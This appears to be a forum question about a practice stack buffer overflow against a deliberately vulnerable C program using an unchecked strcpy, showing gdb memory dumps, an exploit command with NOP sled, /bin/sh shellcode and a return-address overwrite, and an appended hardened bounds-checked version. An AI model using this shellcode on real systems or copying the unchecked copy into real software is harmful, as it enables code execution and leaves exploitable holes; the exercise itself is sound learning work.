I am testing a very simple buffer overflow on the code below.
#include <string.h>

int main(int argc, char** argv) {
    char buffer[25];
    strcpy(buffer, argv[1]); /* unchecked copy: an argv[1] longer than 24 bytes overruns the buffer */
    return 0;
}
I have managed to find, using gdb, that I need to write 37 bytes to reach the RET location. Therefore, I first inserted "AAAA..." to crash the program and get the core file. It ended with SIGSEGV, and I could find that the location of char buffer[25] is 0xbffff6c7.
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) x/20wx $esp-50
0xbffff6be: 0xffff0804 0x1dd6ffff 0x414141e5 0x41414141
0xbffff6ce: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff6de: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff6ee: 0x41414141 0x41414141 0x00414141 0xc858bfff
0xbffff6fe: 0x0000b7fd 0xf71c0000 0xf790bfff 0x0000bfff
(gdb) x/s 0xbffff6c7
0xbffff6c7: 'A' <repeats 50 times>
Then I sent the payload with the combination of shellcode, NOP instructions and the RET value (0xbffff6c7). However, it crashed again with SIGSEGV.
kuics@kuics-VirtualBox:~/practice$ ./vuln $(python -c 'print "\x90"*12 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\xc7\xf6\xff\xbf"')
Segmentation fault (core dumped)
Being confused, I opened the updated core file. Looking into the same location, I found that the shellcode was broken, with many 0x00 bytes in the middle. I'm wondering how this could happen. Are there any possible scenarios?
(gdb) x/20wx $esp-50
0xbffff6ae: 0xf6c70804 0xf8b2bfff 0x9ff4bfff 0x84a10804
0xbffff6be: 0xffff0804 0x1dd6ffff 0x909090e5 0x90909090
0xbffff6ce: 0x90909090 0x50c03190 0x732f2f68 0x622f6868
0xbffff6de: 0x00006e69 0x622f0000 0x2f2f6e69 0x00006873 <= there
0xbffff6ee: 0x00000000 0xf7840000 0xf790bfff 0xc858bfff
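As an added example (not part of the question above), here is the same program with the unchecked strcpy replaced by a length-checked copy. The helper names bounded_copy and check_input, and the BUF_SIZE constant, are my own choices; the buffer size of 25 matches the one in the question. With the check in place an overlong argv[1] is rejected instead of overwriting the saved return address, which is the root cause of the crash being debugged.

```c
/* Added example: hardened variant of the question's program.
 * bounded_copy() refuses input that does not fit (including the NUL), so a
 * long argv[1] can never run past the end of the stack buffer. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 25   /* same size as char buffer[25] in the question */

/* Copy src into dst (capacity dst_size) only if it fits with its NUL.
 * Returns 1 on success, 0 when src is too long; on failure dst is set to
 * the empty string so the caller never reads uninitialised bytes. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0)
        return 0;
    if (len >= dst_size) {       /* no room for len bytes plus the NUL */
        dst[0] = '\0';
        return 0;
    }
    memcpy(dst, src, len + 1);   /* copies the terminating NUL too */
    return 1;
}

/* Same check applied to a BUF_SIZE stack buffer, mirroring the question's
 * main(); returns 1 if the input was accepted, 0 if it was rejected. */
int check_input(const char *src)
{
    char buffer[BUF_SIZE];
    return bounded_copy(buffer, sizeof buffer, src);
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (!check_input(argv[1])) {
        fprintf(stderr, "input too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("input accepted\n");
    return 0;
}
```

Run it with the 50-byte "AAAA..." argument from the question and it exits with "input too long" instead of a segmentation fault; a 24-byte argument is accepted because 24 characters plus the NUL exactly fill the 25-byte buffer.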